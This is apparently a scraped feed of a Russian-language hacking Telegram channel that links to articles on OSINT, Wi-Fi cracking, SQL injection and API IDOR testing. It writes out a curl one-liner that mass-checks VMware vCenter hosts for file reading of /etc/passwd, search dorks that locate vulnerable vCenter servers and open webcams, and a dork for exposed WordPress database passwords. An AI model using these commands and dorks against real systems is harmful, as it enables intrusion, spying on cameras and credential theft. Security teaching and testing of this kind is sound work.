Shodan и Censys: поиск скрытых деталей в Интернете
Поиск Shodan и Censys позволяет найти любые уязвимые устройства в Интернете. Это может быть частью вашего теста на проникновение, чтобы упростить поиск новых вещей в Интернете.
➖ https://telegra.ph/Shodan-i-Censys-poisk-skrytyh-detalej-v-Internete-03-06
Поиск Shodan и Censys позволяет найти любые уязвимые устройства в Интернете. Это может быть частью вашего теста на проникновение, чтобы упростить поиск новых вещей в Интернете.
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Shodan и Censys: поиск скрытых деталей в Интернете
Наша цифровая жизнь связывает огромное количество вещей с Интернетом, начиная от смартфонов, Wi-Fi роутеров, камер наблюдения, Smart TV, сетей SCADA и заканчивая системами управления светофорами. В 2016 году атака ботнета Mirai, которая была организована…
👍3❤1🔥1
OSINT фреймворк для Github
В этой статье рассмотрим OSINT - фреймворк с Github для аналитики пользователей и организаций.
➖ https://telegra.ph/OSINT-frejmvork-dlya-Github-12-17
В этой статье рассмотрим OSINT - фреймворк с Github для аналитики пользователей и организаций.
➖ https://telegra.ph/OSINT-frejmvork-dlya-Github-12-17
Telegraph
OSINT фреймворк для Github
Возможности: Извлекает информацию об организации Извлекает информацию о пользователе Извлекает информацию о репозитории Возвращает содержимое пути из репозитория Возвращает список репозиториев, принадлежащих организации Возвращает список репозиториев, принадлежащих…
Эксплуатация SQL-инъекции в токене авторизации
В данной статье вы увидите пример уязвимости из за забытой валидации закодированных значений и последующую эксплуатацию SQL инъекцию в токене авторизации.
➖ https://telegra.ph/EHkspluataciya-SQL-inekcii-v-tokene-avtorizacii-12-11
В данной статье вы увидите пример уязвимости из за забытой валидации закодированных значений и последующую эксплуатацию SQL инъекцию в токене авторизации.
➖ https://telegra.ph/EHkspluataciya-SQL-inekcii-v-tokene-avtorizacii-12-11
Telegraph
Эксплуатация SQL-инъекции в токене авторизации
Данная статья является переводом и ведётся со слов автора, оригинал тут. Небольшое введение в токены авторизации Токен авторизации генерируется и подписывается серверами и используется для верификации пользователей по уникальным токенам. После успешного входа…
👍3
👺 Лаборатория хакера - авторский канал об информационной безопаности.
Реальные кейсы, OSINT, социальная инженерия, обзоры инструментов с github, гайды по анонимности.
Реальные кейсы, OSINT, социальная инженерия, обзоры инструментов с github, гайды по анонимности.
👍6🥰1
This media is not supported in your browser
VIEW IN TELEGRAM
Juice Jacking – это один из самых инновационных и современных методов взлома таких гаджетов, как смартфоны, которые используют один и тот же USB-шнур для передачи данных и зарядки.
➖https://telegra.ph/CHto-takoe-Juice-Jacking-Pochemu-sleduet-izbegat-obshchestvennyh-USB-portov-02-17
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10👏1
👾 10 приложений для взлома Wi-Fi для Android
В этой статье делимся списком лучших приложений для взлома Wi-Fi для оценки уязвимостей и тестирования на проникновение на Android.
➖ https://telegra.ph/10-prilozhenij-dlya-vzloma-Wi-Fi-dlya-Android-08-14
В этой статье делимся списком лучших приложений для взлома Wi-Fi для оценки уязвимостей и тестирования на проникновение на Android.
➖ https://telegra.ph/10-prilozhenij-dlya-vzloma-Wi-Fi-dlya-Android-08-14
💩22👍4👎1
👾 Актуальные техники взлома WiFi
Универсальный джентльменский набор: ноутбук с «Линуксом» и WiFi-адаптер с интерфейсом USB (их еще называют донглами). Можно использовать и смартфон (см. ссылку выше), но для некоторых атак банально требуется второй USB-порт. Годится даже ноутбук без установленной ОС и вообще без накопителя.
https://bookflow.ru/aktualnye-tehniki-vzloma-wifi/
Универсальный джентльменский набор: ноутбук с «Линуксом» и WiFi-адаптер с интерфейсом USB (их еще называют донглами). Можно использовать и смартфон (см. ссылку выше), но для некоторых атак банально требуется второй USB-порт. Годится даже ноутбук без установленной ОС и вообще без накопителя.
https://bookflow.ru/aktualnye-tehniki-vzloma-wifi/
👍18😁2
Автор книги проникает в тайны мрачного и опасного мира "подпольного Интернета" - "Даркнета". Именно здесь рождаются самые радикальные идеи современности, а запрещенные законом услуги и товары без проблем приобретаются за крипто-валюту. Анонимность, терроризм, секретные документы, ставки на смерть знаменитостей - только малая часть того, о чем беспристрастно и честно рассказывает в своей книге Джейми Бартлетт.
Скачать: здесь
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7👍1👎1🔥1😁1🤔1🤬1
⚡️ В Telegram появился первый архив нейросетей — Пакет Нейросетей
Внутри доступны ИИ под любые задачи: для образования, работы, развлечений и творчества.
Например:
• 12 нейросетей в одном посте (SMM, дизайн, таргет, CEO, программирование и даже генератор Reels'ов для Инсты)
• Первый в мире конструктор нейросетей (да, вы можете создать свою по запросу)
• И даже Dream Interpreter AI, визуализирующий ваши сны.
Обновления, анонсы новых проектов и всё-всё про нейросети тоже здесь.
Подписывайтесь!
Внутри доступны ИИ под любые задачи: для образования, работы, развлечений и творчества.
Например:
• 12 нейросетей в одном посте (SMM, дизайн, таргет, CEO, программирование и даже генератор Reels'ов для Инсты)
• Первый в мире конструктор нейросетей (да, вы можете создать свою по запросу)
• И даже Dream Interpreter AI, визуализирующий ваши сны.
Обновления, анонсы новых проектов и всё-всё про нейросети тоже здесь.
Подписывайтесь!
👍5😁2
У большинства API есть конечная точка для создания, удаления, обновления и чтения объекта или группы объектов.
Если вы видите:
DELETE /api/item/32 (удаление)
То попробуйте:POST /api/item (создание)
GET /api/item/33 (чтение)
PUT /api/item/33 (обновление)
Затем протестируйте каждый из них на IDOR, поочередно проверяя аутентификацию и уровни доступа к различным объектам. Методологическое тестирование - лучший способ взломать API.Иногда тестирование API усложняется тем, что мы можем не знать нужные для запроса поля или параметры. Однако есть способы найти их, например: если вы знаете поля для GET, вы так же можете отправить и PUT, изменив некоторые значения.
Кроме того, есть инструменты, такие как Arjun, которые могут находить параметры, а иногда и сами API просто возвращают сообщения об ошибках, когда какой-то из параметров отсутствует.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤🔥2
В этой статье представлен взлом веб-приложения с большим количеством пользователей.
➖ https://telegra.ph/Krazha-informacii-millionov-lyudej-12-22
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5😢2
Топ 7 скриптов для сканера NMAP
🔗Dns — brute.nse
🔗Traceroute — отображает географическое местоположение цели.
🔗firewalk.nse — этот скрипт пытается узнать правила брандмауэра.
🔗Http-sitemap-generator.nse — Паук вэб-сервера который отображает структуру сайта, файлы и каталоги.
🔗HTTP-methods.nse — определяет какие параметры поддерживаются HTTP-сервером, отправив запрос OPTIONS. Он проверяет те методы, которые не указаны в заголовках OPTIONS, и видит, реализованы ли они.
🔗Whois-domain.nse — получает информацию о доменном имени цели.
🔗Shodan-api.nse — этот скрипт попросит API ключик для поисковика SHODAN. Выдаст всю информацию о хосте, которая имеется в SHODAN-e
#usefl
🔗Dns — brute.nse
🔗Traceroute — отображает географическое местоположение цели.
🔗firewalk.nse — этот скрипт пытается узнать правила брандмауэра.
🔗Http-sitemap-generator.nse — Паук вэб-сервера который отображает структуру сайта, файлы и каталоги.
🔗HTTP-methods.nse — определяет какие параметры поддерживаются HTTP-сервером, отправив запрос OPTIONS. Он проверяет те методы, которые не указаны в заголовках OPTIONS, и видит, реализованы ли они.
🔗Whois-domain.nse — получает информацию о доменном имени цели.
🔗Shodan-api.nse — этот скрипт попросит API ключик для поисковика SHODAN. Выдаст всю информацию о хосте, которая имеется в SHODAN-e
#usefl
👍16❤3
В этой статье мы рассмотрим 20 лучших инструментов для хакинга на Kali Linux. Это подборка средств для аудита и взлома беспроводных сетей, проверки уязвимостей и разведки.
#tools #kali
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7❤2
🇪🇺 Списки слов для фаззинга сайтов на разных языках
При фаззинге сайта полезно учитывать его географическое положение и языковые особенности, а значит, следует использовать слова, которые присущи тем или иным языкам. Ниже представлены некоторые вордлисты, для различных языков:
💬 Infosec Wordlists
💬 Dirbuster Spanish
💬 Bip Spanish
💬 Türkçe Wordlist
💬 krypt0n wordlists
💬 Combined-Wordlists
💬 Common Web Managers Fuzz Wordlists
💬 Cracking French passwords
#fuzz #wordlist
При фаззинге сайта полезно учитывать его географическое положение и языковые особенности, а значит, следует использовать слова, которые присущи тем или иным языкам. Ниже представлены некоторые вордлисты, для различных языков:
#fuzz #wordlist
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤2👏1
Представленный ниже репозиторий содержит подборку видео по тестированию веб-приложений на различные уязвимости. Для удобства, содержимое разбито на категории, в зависимости от типа атак и уязвимостей.
#Web
Please open Telegram to view this post
VIEW IN TELEGRAM
В VMware vCenter обнаружили ряд уязвимостей, среди которых несанкционированное чтение произвольных файлов, SSRF и XSS. Протестировано на версии 7.0.2.00100, информации про полный список уязвимых версий нет.
Для поиска уязвимых хостов можно использовать однострочник:
cat target.txt| while read host do;do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"| grep "root:x" && echo "$host Vulnerable";done
Дорк, который можно использовать для поиска в Shodan:http.title:"ID_VC_Welcome"
Для поиска в Zoomeye:app:"VMware vCenter"
#LFI #SSRF #XSSPlease open Telegram to view this post
VIEW IN TELEGRAM
👍3❤1👏1🤔1
🔬 Поиск внутренних служб в файлах JavaScript
Если вы нашли SSRF, но не смогли получить доступ к внутренним веб-службам, всегда стоит заглянуть в файлы JavaScript, в частности в
Осмотрите содержимое этих файлов по ключевым словам
#SSRF #JS
Если вы нашли SSRF, но не смогли получить доступ к внутренним веб-службам, всегда стоит заглянуть в файлы JavaScript, в частности в
main.js или app.js.Осмотрите содержимое этих файлов по ключевым словам
localhost, 127.0.0.1, host, port, и т.д., и вы можете найти скрытые внутренние ресурсы, к которым можно получить доступ через SSRF.#SSRF #JS
👍4🥰1
Обход регистрации, захват аккаунта любого пользователя и выполнение действий от его имени с помощью изменений в своем личном кабинете.
#ATO
Please open Telegram to view this post
VIEW IN TELEGRAM
📚 Небольшая подборка онлайн лаб от Hackxpert
Ниже представлена подборка лабораторий для практики поиска различных уязвимостей:
💬 Reflected XSS
💬 Stored XSS
💬 JWT
💬 RFI
💬 LFI
💬 Обход Captcha
💬 Обход панели входа админа
💬 Open redirects
#web #lab
Ниже представлена подборка лабораторий для практики поиска различных уязвимостей:
#web #lab
Please open Telegram to view this post
VIEW IN TELEGRAM
👎9❤4🤔1
Ниже представлена небольшая подборка Google дорков для поиска открытых веб-камер:
allintitle: "Network Camera NetworkCamera"
intitle:"EvoCam" inurl:"webcam.html"
intitle:"Live View / - AXIS"
intitle:"LiveView / - AXIS" | inurl:view/view.shtml
intitle:"Live View / - AXIS" | inurl:/mjpg/video.mjpg?timestamp
inurl:axis-cgi/jpg
inurl:"MultiCameraFrame?Mode=Motion"
inurl:/view.shtml
inurl:/view/index.shtml
"my webcamXP server!"
#DorkingPlease open Telegram to view this post
VIEW IN TELEGRAM
👍16
1.- Оставлять настройки по умолчанию.Скрин ниже тому подтверждение. Найти подобные хосты можно с помощью Google дорка:
2.- Допускать отсутствия контроля над публичным контентом и политиками.
"define('DB_USER'," "define('DB_PASSWORD'," ext:txt
#WPPlease open Telegram to view this post
VIEW IN TELEGRAM
👍10💘1